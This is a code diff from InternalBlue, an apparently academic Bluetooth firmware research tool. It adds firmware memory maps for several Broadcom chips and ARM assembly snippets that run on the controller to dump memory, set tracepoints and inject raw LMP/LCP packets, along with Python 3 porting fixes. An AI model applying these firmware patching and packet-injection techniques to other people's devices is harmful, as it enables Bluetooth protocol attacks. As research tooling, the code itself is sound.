READ_MEM_ALIGNED_ASM_SNIPPET = """
push {r4, lr}
// malloc HCI event buffer
mov r0, 0xff // event code is 0xff (vendor specific HCI Event)
mov r1, %d // readMemAligned() injects the number of bytes it wants to read here
add r1, 6 // + type and length + 'READ'
bl 0x15DD4 // hci_sendEvent (will automatically copy event code and length into the buffer)
mov r4, r0 // save pointer to the buffer in r4
// append our custom header (the word 'READ') after the event code and event length field
add r0, 2 // write after the length field
ldr r1, =0x44414552 // 'READ'
str r1, [r0]
add r0, 4 // advance the pointer. r0 now points to the beginning of our read data
// copy data to buffer
ldr r1, =0x%x // readMemAligned() injects the read_address here. r1 will be used as src pointer in the loop
mov r2, %d // readMemAligned() injects the number of dwords to read here. r2 will be the loop counter
loop:
ldr r3, [r1] // read 4 bytes from the read_address
str r3, [r0] // store them inside the HCI buffer
add r0, 4 // advance the buffer pointer
add r1, 4 // advance the read_address
subs r2, 1 // decrement the loop variable
bne loop // branch if r2 is not zero yet
// send HCI buffer to the host
mov r0, r4 // r4 still points to the beginning of the HCI buffer
bl 0x573B8 // send_hci_event_without_free()
// free HCI buffer
mov r0, r4
bl 0x581AE // osapi_blockPoolFree
pop {r4, pc} // return
"""
internalblue/fw/fw_0x411a.py
+47
View File
@@ -0,0 +1,47 @@
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# Samsung Galaxy S8
FW_NAME = "BCM4347B0"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x00100000, True, False), # Internal ROM
MemorySection(0x00130000, 0x00150000, False, True), # Internal Memory Patchram Contents
MemorySection(0x00200000, 0x0023ffff, False, True), # Internal Memory Cortex M3
]
# Patchram
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310404
PATCHRAM_VALUE_TABLE_ADDRESS = 0x130000
PATCHRAM_NUMBER_OF_SLOTS = 256
PATCHRAM_ALIGNED = False
# Heap
BLOC_HEAD = 0x20067C # g_dynamic_memory_GeneralUsePools
BLOC_NG = True # Next Generation Bloc Buffer
internalblue/fw/fw_0x4196.py
+41
View File
@@ -0,0 +1,41 @@
#!/usr/bin/env python2
#
# fw_0x220e.py
#
# Firmware file for BCM20702A1 chipsets. These chipsets are typically used for
# Bluetooth USB dongles.
#
# Copyright (c) 2019 Jan Ruge and Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
FW_NAME = "BCM20702A2"
# Device Infos
#DEVICE_NAME = 0x280CD0 # rm_deviceLocalName, FIXME has no longer a length byte prepended
#BD_ADDR = 0x280CA4 # rm_deviceBDAddr
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x5ffff, True, False), # Internal ROM
MemorySection(0x80000, 0x9bfff, False, True), # Internal RAM
]
BLOC_HEAD = 0x3166c
internalblue/fw/fw_0x4208.py
+3 -3
View File
@@ -20,11 +20,11 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
# Evaluation Kit CYW927035
FW_NAME = "CYW27035B1"
# Evaluation Kit CYW920735
FW_NAME = "CYW20735B1"
# Device Infos
DEVICE_NAME = 0x280CD0 # rm_deviceLocalName, FIXME has no longer a length byte prepended
internalblue/fw/fw_0x420e.py
+79 -4
View File
@@ -20,11 +20,12 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
# Evaluation Kit CYW927019
FW_NAME = "CYW27039B1"
# Evaluation Kit CYW920719
FW_NAME = "CYW20739B1 (NOT iPhone X/XR!)"
# TODO this is not the iPhone firmware, we need to add a switch in fw.py
# Device Infos
DEVICE_NAME = 0x280CD0 # rm_deviceLocalName, FIXME has no longer a length byte prepended
@@ -46,8 +47,82 @@ SECTIONS = [ MemorySection(0x00000000, 0x001fffff, True, False), # Internal R
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310404
PATCHRAM_VALUE_TABLE_ADDRESS = 0x270000
PATCHRAM_NUMBER_OF_SLOTS = 192
PATCHRAM_NUMBER_OF_SLOTS = 256
PATCHRAM_ALIGNED = False
# only seems to work 4-byte aligned here ...
# Assembler snippet for tracepoints
# In contrast to the Nexus 5 patch, we uninstall ourselves automatically and use internal debug functions
TRACEPOINT_BODY_ASM_LOCATION = 0x00223100
TRACEPOINT_HOOKS_LOCATION = 0x00223200
TRACEPOINT_HOOK_SIZE = 40
TRACEPOINT_HOOK_ASM = """
push {r0-r12, lr} // save all registers on the stack (except sp and pc)
ldr r6, =0x%x // addTracepoint() injects pc of original tracepoint here
mov r0, %d // addTracepoint() injects the patchram slot of the hook patch
bl 0x34964 // patch_uninstallPatchEntry(slot)
bl 0x%x // addTracepoint() injects TRACEPOINT_BODY_ASM_LOCATION here
pop {r0-r12, lr} // restore registers
// branch back to the original instruction
b 0x%x // addTracepoint() injects the address of the tracepoint
"""
TRACEPOINT_BODY_ASM_SNIPPET = """
mov r8, lr // save link register in r8
// dump registers like before
// save status register in r5
mrs r5, cpsr
// malloc HCI event buffer
mov r0, 0xff // event code is 0xff (vendor specific HCI Event)
mov r1, 76 // buffer size: size of registers (68 bytes) + type and length + 'TRACE_'
bl 0xF7B6 // hci_allocateEventBlockWithLen(0xff, 78)
mov r4, r0 // save pointer to the buffer in r4
// append our custom header (the word 'TRACE_') after the event code and event length field
add r0, 2 // write after the length field
ldr r1, =0x43415254 // 'TRAC'
str r1, [r0]
add r0, 4 // advance the pointer.
ldr r1, =0x5f45 // 'E_'
strh r1, [r0]
add r0, 2 // advance the pointer. r0 now points to the start of the register values
// store pc
str r6, [r0] // r6 still contains the address of the original pc
add r0, 4 // advance the pointer.
// store sp
mov r1, 56 // 14 saved registers * 4
add r1, sp
str r1, [r0]
add r0, 4 // advance the pointer.
// store status register
str r5, [r0]
add r0, 4 // advance the pointer.
// store other registers
mov r1, sp
mov r2, 56
bl 0xAF0BC // memcpy(dst, src, len)
// send HCI buffer to the host
mov r0, r4 // r4 still points to the beginning of the HCI buffer
bl 0xF782 // hci_sendEvent
// restore status register
msr cpsr_f, r5
bl 0x2D702 // bthci_event_vs_DBFW_CoreDumpRAMImageEvent
mov lr, r8 // restore lr from r8
bx lr // return
"""
internalblue/fw/fw_0x420e_iphone.py
+41
View File
@@ -0,0 +1,41 @@
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# iPhone 8/X/XR
FW_NAME = "BCM4347B1"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x00103fff, True, False), # Internal ROM
MemorySection(0x00130000, 0x0014ffff, False, True), # Internal Memory Patchram Contents
MemorySection(0x00200000, 0x0024ffff, False, True), # Internal Memory Cortex M3
]
# Patchram
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310404
PATCHRAM_VALUE_TABLE_ADDRESS = 0x130000
PATCHRAM_NUMBER_OF_SLOTS = 256
PATCHRAM_ALIGNED = False
internalblue/fw/fw_0x422a.py
+1 -1
View File
@@ -22,7 +22,7 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
FW_NAME = "BCM2070B0 (MacBook Pro 2011)"
internalblue/fw/fw_0x6103.py
+7 -1
View File
@@ -20,7 +20,7 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
# This runs on an iPhone 7
@@ -46,3 +46,9 @@ SECTIONS = [ MemorySection(0x0, 0x90000, True , False),
MemorySection(0x650000, 0x650800, False, False),
#MemorySection(0x680000, 0x800000, False, False)
]
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204
PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
PATCHRAM_NUMBER_OF_SLOTS = 192
PATCHRAM_ALIGNED = False
internalblue/fw/fw_0x6109.py
+20 -2
View File
@@ -25,7 +25,7 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
# This runs on Nexus 5, Xperia Z3, Samsung Galaxy Note 3
@@ -79,7 +79,25 @@ PATCHRAM_NUMBER_OF_SLOTS = 128
PATCHRAM_ALIGNED = True #use readMemAligned, not accessible via ReadRAM HCI command on Nexus 5
# Snippet for sendLmpPacket()
# Snippet for sendLcpPacket()
SENDLCP_CODE_BASE_ADDRESS = 0x00211900
SENDLCP_ASM_CODE = """
push {r4,lr}
// we want to call lmulp_sendLcp(conn_index, input, length)
mov r0, %d // connection index, starts at 0
ldr r1, =payload
mov r2, %d // length
bl 0x66760 // lmulp_sendLcp
pop {r4,pc} // go back
.align // The payload (LMP packet) must be 4-byte aligend (memcpy needs aligned addresses)
payload: // Note: the payload will be appended here by the sendLmpPacket() function
"""
# Snippet for sendLmpPacketLegacy()
SENDLMP_CODE_BASE_ADDRESS = 0xd7500
SENDLMP_ASM_CODE = """
push {r4,lr}
internalblue/fw/fw_0x6119.py
+24 -1
View File
@@ -27,13 +27,14 @@
# Firmware Infos
# This runs on Rasperry Pi 3+
from builtins import object
FW_NAME = "BCM4345C0"
# Device Infos
DEVICE_NAME = 0x204954
# Memory Sections
class MemorySection:
class MemorySection(object):
def __init__(self, start_addr, end_addr, is_rom, is_ram):
self.start_addr = start_addr
self.end_addr = end_addr
@@ -72,3 +73,25 @@ PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
PATCHRAM_NUMBER_OF_SLOTS = 128
PATCHRAM_ALIGNED = False
# Heap
BLOC_HEAD = 0x200490 # g_dynamic_memory_GeneralUsePools
BLOC_NG = True # Next Generation Bloc Buffer
# Snippet for sendLcpPacket()
SENDLCP_CODE_BASE_ADDRESS = 0x21f000
SENDLCP_ASM_CODE = """
push {r4,lr}
// we want to call lmulp_sendLcp(conn_index, input, length)
mov r0, %d // connection index, starts at 0
ldr r1, =payload
mov r2, %d // length
bl 0x92062 // lmulp_sendLcp
pop {r4,pc} // go back
.align // The payload (LMP packet) must be 4-byte aligend (memcpy needs aligned addresses)
payload: // Note: the payload will be appended here by the sendLmpPacket() function
"""
internalblue/fw/fw_0x617e.py
+43
View File
@@ -0,0 +1,43 @@
# fw_0x617e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# iPhone 6
FW_NAME = "BCM4345B0"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x000c07ff, True, False), # Internal ROM
MemorySection(0x000d0000, 0x000dffff, False, True), # Internal Memory Patchram Contents
MemorySection(0x00200400, 0x00201cff, False, True), # Internal Memory Cortex M3
]
# Patchram
#PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000 #TODO needs to be aligned read
#PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204
#PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
#PATCHRAM_NUMBER_OF_SLOTS = 128
#PATCHRAM_ALIGNED = True
# only seems to work 4-byte aligned here ...
internalblue/fw/fw_0x6206.py
+43
View File
@@ -0,0 +1,43 @@
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# iPhone SE
FW_NAME = "BCM4345C1"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x000c07ff, True, False), # Internal ROM
MemorySection(0x000d0000, 0x000dffff, False, True), # Internal Memory Patchram Contents
MemorySection(0x00200400, 0x00201cff, False, True), # Internal Memory Cortex M3
]
# Patchram
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204
PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
PATCHRAM_NUMBER_OF_SLOTS = 128
PATCHRAM_ALIGNED = False
# only seems to work 4-byte aligned here ...
internalblue/fw/fw_default.py
+2 -13
View File
@@ -22,7 +22,7 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
FW_NAME = "default (unknown firmware)"
@@ -31,16 +31,5 @@ FW_NAME = "default (unknown firmware)"
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x0, 0x90000, True , False),
MemorySection(0xd0000, 0xd8000, False, True ),
#MemorySection(0xe0000, 0x1f0000, True , False),
MemorySection(0x200000, 0x228000, False, True ),
MemorySection(0x260000, 0x268000, True , False),
#MemorySection(0x280000, 0x2a0000, True , False),
MemorySection(0x318000, 0x320000, False, False),
MemorySection(0x324000, 0x360000, False, False),
MemorySection(0x362000, 0x362100, False, False),
MemorySection(0x363000, 0x363100, False, False),
MemorySection(0x600000, 0x600800, False, False),
MemorySection(0x640000, 0x640800, False, False),
MemorySection(0x650000, 0x650800, False, False),
#MemorySection(0x680000, 0x800000, False, False)
MemorySection(0x200000, 0x228000, False, True )
]
internalblue/hci.py
+65 -10
View File
@@ -25,6 +25,10 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from __future__ import absolute_import
from builtins import hex
from builtins import range
from builtins import object
from pwn import *
HCI_UART_TYPE_CLASS = {}
@@ -52,10 +56,11 @@ class HCI(object):
@staticmethod
def from_data(data):
uart_type = ord(data[0])
uart_type = data[0]
return HCI_UART_TYPE_CLASS[uart_type].from_data(data[1:])
def __init__(self, uart_type):
self.event_code = None
self.uart_type = uart_type
def getRaw(self):
@@ -214,7 +219,7 @@ class HCI_Cmd(HCI):
0x0c6c : "COMND Read_LE_Host_Support",
0x0c6d : "COMND Write_LE_Host_Support",
0x0c6e : "COMND Set_MWS_Channel_Parameters",
0x0c6f : "COMND Set_ External_Frame_Configuration",
0x0c6f : "COMND Set_External_Frame_Configuration",
0x0c70 : "COMND Set_MWS_Signaling",
0x0c71 : "COMND Set_MWS_Transport_Layer",
0x0c72 : "COMND Set_MWS_Scan_Frequency_Table",
@@ -572,7 +577,7 @@ class HCI_Cmd(HCI):
0xffed : "COMND VSC_EnterDownloadMode"
}
HCI_CMD_STR_REVERSE = {v: k for k, v in HCI_CMD_STR.iteritems()}
HCI_CMD_STR_REVERSE = {v: k for k, v in HCI_CMD_STR.items()}
@staticmethod
def cmd_name(opcode):
@@ -606,7 +611,7 @@ class HCI_Cmd(HCI):
@staticmethod
def from_data(data):
return HCI_Cmd(u16(data[0:2]), ord(data[2]), data[3:])
return HCI_Cmd(u16(data[0:2]), data[2], data[3:])
def __init__(self, opcode, length, data):
HCI.__init__(self, HCI.HCI_CMD)
@@ -622,7 +627,7 @@ class HCI_Cmd(HCI):
cmdname = "unknown"
if self.opcode in self.HCI_CMD_STR:
cmdname = self.HCI_CMD_STR[self.opcode]
return parent + "<0x%04x %s (len=%d): %s>" % (self.opcode, cmdname, self.length, self.data[0:16].encode('hex'))
return parent + "<0x%04x %s (len=%d): %s>" % (self.opcode, cmdname, self.length, ''.join(format(x, '02x') for x in self.data[0:16]))
class HCI_Acl(HCI):
@@ -697,7 +702,7 @@ class HCI_Diag(HCI):
cmdname = "unknown"
if self.opcode in self.BCM_DIAG_STR:
cmdname = self.BCM_DIAG_STR[self.opcode]
return parent + "<0x%02x %s: %s>" % (self.opcode, cmdname, self.data[0:16].encode('hex'))
return parent + "<0x%02x %s: %s>" % (self.opcode, cmdname, ''.join(format(x, '02x') for x in self.data[0:16]))
class HCI_Event(HCI):
@@ -886,7 +891,7 @@ class HCI_Event(HCI):
@staticmethod
def from_data(data):
return HCI_Event(ord(data[0]), ord(data[1]), data[2:])
return HCI_Event(data[0], data[1], data[2:])
def __init__(self, event_code, length, data):
HCI.__init__(self, HCI.HCI_EVT)
@@ -902,7 +907,7 @@ class HCI_Event(HCI):
eventname = "unknown"
if self.event_code in self.HCI_EVENT_STR:
eventname = self.HCI_EVENT_STR[self.event_code]
return parent + "<0x%02x %s (len=%d): %s>" % (self.event_code, eventname, self.length, self.data[0:].encode('hex'))
return parent + "<0x%02x %s (len=%d): %s>" % (self.event_code, eventname, self.length, ''.join(format(x, '02x') for x in self.data[0:]))
HCI_UART_TYPE_CLASS = {
HCI.HCI_CMD : HCI_Cmd,
@@ -916,7 +921,7 @@ def parse_hci_packet(data):
return HCI.from_data(data)
class StackDumpReceiver:
class StackDumpReceiver(object):
memdump_addr = None
memdumps = {}
stack_dump_has_happend = False
@@ -937,8 +942,10 @@ class StackDumpReceiver:
self.handleNexus6pStackDump(hcipkt)
if hcipkt.data[0:4] == p32(0x039200f7):
self.handleNexus5StackDump(hcipkt)
# same header for S10 and evaluation board...
if hcipkt.data[0:2] == p16(0x031b): # generated by bthci_event_vs_initializeCoredumpHdr()
self.handleEvalStackDump(hcipkt)
self.handleS10StackDump(hcipkt)
def verifyChecksum(self, data):
@@ -955,6 +962,7 @@ class StackDumpReceiver:
if self.memdump_addr == None:
self.memdump_addr = addr
self.memdumps[addr-self.memdump_addr] = data[4:]
log.debug("Stack dump handling addr %08x", addr-self.memdump_addr)
def finishStackDump(self):
dump = fit(self.memdumps)
@@ -1067,7 +1075,7 @@ class StackDumpReceiver:
'\n'.join([hex(x) for x in values])))
if data[0] == '\x02':
# This is the second stack dump event (contains register values)
log.warn("Received Stack-Dump Event (contains %d registers):" % (u8(data[1])))
log.warn("Received Evaluation Stack-Dump Event (contains %d registers):" % (u8(data[1])))
registers = "pc: 0x%08x lr: 0x%08x sp: 0x%08x r0: 0x%08x r1: 0x%08x\n" % \
(values[2], values[3], values[1], values[4], values[5])
registers += "r2: 0x%08x r3: 0x%08x r4: 0x%08x r5: 0x%08x r6: 0x%08x\n" % \
@@ -1089,4 +1097,51 @@ class StackDumpReceiver:
self.finishStackDump()
return True
# On a Raspberry Pi 3, the last packet of a stack dump is '1b0340df0338'.... so it's 0x40
elif packet_type == 0xe8:
# FIXME Raspi memdump is divided in two parts!
# address change from 0001fe38 to packet type e8 and then it's computing addr -0130000
# negative addr does not work with finishStackDump()
# so even though the last packet is 0x40, let's just finish on 0xe8
log.info("End of first stackdump block, writing to file and skipping second...")
self.finishStackDump()
return True
return False
def handleS10StackDump(self, hcipkt):
"""
Packets in stack dump:
1b 03 90: contains pc and r0
1b 03 9c
1b 03 00 (x3)
1b 03 f0 (whole ram)
"""
checksum_correct = self.verifyChecksum(hcipkt.data[3:])
packet_type = u8(hcipkt.data[2])
if packet_type == 0x90:
data = hcipkt.data[4:]
values = [u32(data[i:i+4]) for i in range(0, 64*2, 4)]
log.debug("Stack Dump (%s):\n%s" % ("checksum correct" if checksum_correct else "checksum NOT correct",
'\n'.join([hex(x) for x in values])))
# Values different than in other stack dump formats, experimental output!
log.warn("Received S10 Stack-Dump Event (contains %d registers):" % (u8(data[1])))
registers = "pc: 0x%08x lr: 0x%08x sp: 0x%08x r0: 0x%08x r1: 0x%08x\n" % \
(values[16], values[17], values[23], values[19], values[20])
registers += "r2: 0x%08x r3: 0x%08x r4: 0x%08x r5: 0x%08x r6: 0x%08x\n" % \
(values[21], values[22], values[23], values[24], values[25])
log.warn(registers)
return True
# log.info("%x" % u32(hcipkt.data[8:12]))
# no last packet for S10e, just the size counts here... also is sometimes longer and sometimes shorter
if packet_type == 0xf0 and u32(hcipkt.data[8:12]) == 0x230080:
# This is the last pkt ouput:
self.finishStackDump()
return True
return False
internalblue/hcicore.py
+39 -16
View File
@@ -1,14 +1,28 @@
#!/usr/bin/env python2
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import zip
from builtins import range
import subprocess
import datetime
from pwn import *
import fcntl
from core import InternalBlue
import hci
import Queue
from .core import InternalBlue
from . import hci
import queue as queue2k
import threading
try:
from typing import List
from internalblue import Device
except:
pass
# from /usr/include/bluetooth/hci.h:
#define HCIDEVUP _IOW('H', 201, int)
#define HCIGETDEVLIST _IOR('H', 210, int)
@@ -27,11 +41,14 @@ HCIGETDEVINFO = _IOR(ord('H'), 211, 4)
class HCICore(InternalBlue):
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory="."):
super(HCICore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory)
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory=".", replay=False):
super(HCICore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory, replay)
self.btsnooplog_file_lock = threading.Lock()
self.serial = False
self.doublecheck = False
def getHciDeviceList(self):
# type: () -> List[Device]
"""
Get a list of available HCI devices. The list is obtained by executing
ioctl syscalls HCIGETDEVLIST and HCIGETDEVINFO. The returned list
@@ -54,7 +71,7 @@ class HCICore(InternalBlue):
# Do ioctl(s,HCIGETDEVLIST,arg) to get the number of available devices:
# arg is struct hci_dev_list_req (/usr/include/bluetooth/hci.h)
arg = p32(16) # dl->dev_num = HCI_MAX_DEV which is 16 (little endian)
arg += "\x00"*(8*16)
arg += b"\x00"*(8*16)
devices_raw = fcntl.ioctl(s.fileno(), HCIGETDEVLIST, arg)
num_devices = u16(devices_raw[:2])
log.debug("Found %d HCI devices via ioctl(HCIGETDEVLIST)!" % num_devices)
@@ -65,10 +82,10 @@ class HCICore(InternalBlue):
dev_id = u16(devices_raw[dev_struct_start:dev_struct_start+2])
# arg is struct hci_dev_info (/usr/include/bluetooth/hci.h)
arg = p16(dev_id) # di->dev_id = <device_id>
arg += "\x00"*20 # Enough space for name, bdaddr and flags
dev_info_raw = fcntl.ioctl(s.fileno(), HCIGETDEVINFO, arg)
dev_name = dev_info_raw[2:10].replace("\x00","")
dev_bdaddr = ":".join(["%02X" % ord(x) for x in dev_info_raw[10:16][::-1]])
arg += b"\x00"*20 # Enough space for name, bdaddr and flags
dev_info_raw = bytearray(fcntl.ioctl(s.fileno(), HCIGETDEVINFO, arg))
dev_name = dev_info_raw[2:10].replace(b"\x00",b"").decode()
dev_bdaddr = ":".join(["%02X" % x for x in dev_info_raw[10:16][::-1]])
dev_flags = u32(dev_info_raw[16:20])
if dev_flags == 0:
dev_flags_str = "DOWN"
@@ -115,14 +132,15 @@ class HCICore(InternalBlue):
"""
Return a list of connected hci devices.
"""
if self.replay:
return [(self, "hci_replay", 'hci: ReplaySocket')]
device_list = []
for dev in self.getHciDeviceList():
log.info("HCI device: %s [%s] flags=%d<%s>" %
(dev["dev_name"], dev["dev_bdaddr"],
dev["dev_flags"], dev["dev_flags_str"]))
device_list.append([self, dev["dev_name"], 'hci: %s (%s) <%s>' %
(dev["dev_bdaddr"], dev["dev_name"], dev["dev_flags_str"])])
device_list.append((self, dev["dev_name"], 'hci: %s (%s) <%s>' %
(dev["dev_bdaddr"], dev["dev_name"], dev["dev_flags_str"])))
if len(device_list) == 0:
log.info('No connected HCI device found')
@@ -180,8 +198,13 @@ class HCICore(InternalBlue):
# Read the record data
try:
record_data = self.s_snoop.recv(1024)
record_data = bytearray(record_data)
except socket.timeout:
continue # this is ok. just try again without error
except Exception as e:
log.critical("Lost device interface with exception {}, terminating receive thread...".format(e))
self.exit_requested = True
continue
# btsnoop record header data:
btsnoop_orig_len = len(record_data)
@@ -211,7 +234,7 @@ class HCICore(InternalBlue):
if filter_function == None or filter_function(record):
try:
queue.put(record, block=False)
except Queue.Full:
except queue.Full:
log.warn("recvThreadFunc: A recv queue is full. dropping packets..")
# Call all callback functions inside registeredHciCallbacks and pass the
@@ -262,7 +285,7 @@ class HCICore(InternalBlue):
"""
# TODO still seems to only forward incoming events?!
self.s_snoop.setsockopt(socket.SOL_HCI, socket.HCI_FILTER,
'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00') #type mask, event mask, event mask, opcode
b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00') #type mask, event mask, event mask, opcode
interface_num = device["dev_id"]
log.debug("Socket interface number: %s" % (interface_num))
@@ -276,7 +299,7 @@ class HCICore(InternalBlue):
# Write Header to btsnoop file (if file is still empty):
if self.write_btsnooplog and self.btsnooplog_file.tell() == 0:
# BT Snoop Header: btsnoop\x00, version: 1, data link type: 1002
btsnoop_hdr = "btsnoop\x00" + p32(1,endian="big") + p32(1002,endian="big")
btsnoop_hdr = b"btsnoop\x00" + p32(1,endian="big") + p32(1002,endian="big")
with self.btsnooplog_file_lock:
self.btsnooplog_file.write(btsnoop_hdr)
self.btsnooplog_file.flush()
internalblue/ioscore.py
+96 -29
View File
@@ -1,12 +1,16 @@
#!/usr/bin/env python2
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import str
import socket
import Queue
import hci
import queue as queue2k
from . import hci
from pwn import *
from core import InternalBlue
from .core import InternalBlue
class iOSCore(InternalBlue):
@@ -18,6 +22,9 @@ class iOSCore(InternalBlue):
exit(-1)
self.ios_addr = parts[0]
self.ios_port = parts[1]
self.serial = False
self.doublecheck = True
self.buffer = ""
def device_list(self):
"""
@@ -37,7 +44,7 @@ class iOSCore(InternalBlue):
return device_list
def sendH4(self, h4type, data, timeout=2):
def sendH4(self, h4type, data, timeout=0.5):
"""
Send an arbitrary HCI packet by pushing a send-task into the
sendQueue. This function blocks until the response is received
@@ -46,16 +53,16 @@ class iOSCore(InternalBlue):
the command or None if no response was received within the timeout.
"""
queue = Queue.Queue(1)
queue = queue2k.Queue(1)
try:
self.sendQueue.put((h4type, data, queue, None), timeout=timeout)
ret = queue.get(timeout=timeout)
return ret
except Queue.Empty:
except queue2k.Empty:
log.warn("sendH4: waiting for response timed out!")
return None
except Queue.Full:
except queue.Full:
log.warn("sendH4: send queue is full!")
return None
@@ -85,13 +92,62 @@ class iOSCore(InternalBlue):
# with ios proxy the send and receive sockets are the same
self.s_snoop = self.s_inject
return True
def _getLatestH4Blob(self, new_data=""):
data_out = ""
self.buffer += new_data
if len(self.buffer) > 0:
# if the buffer is too small, wait for more data
if len(self.buffer) < 5:
return (None, False)
else:
#log.info(self.buffer[0].encode("hex"))
# for ACL data the length field is at offset 3
if self.buffer[0] == '\x02':
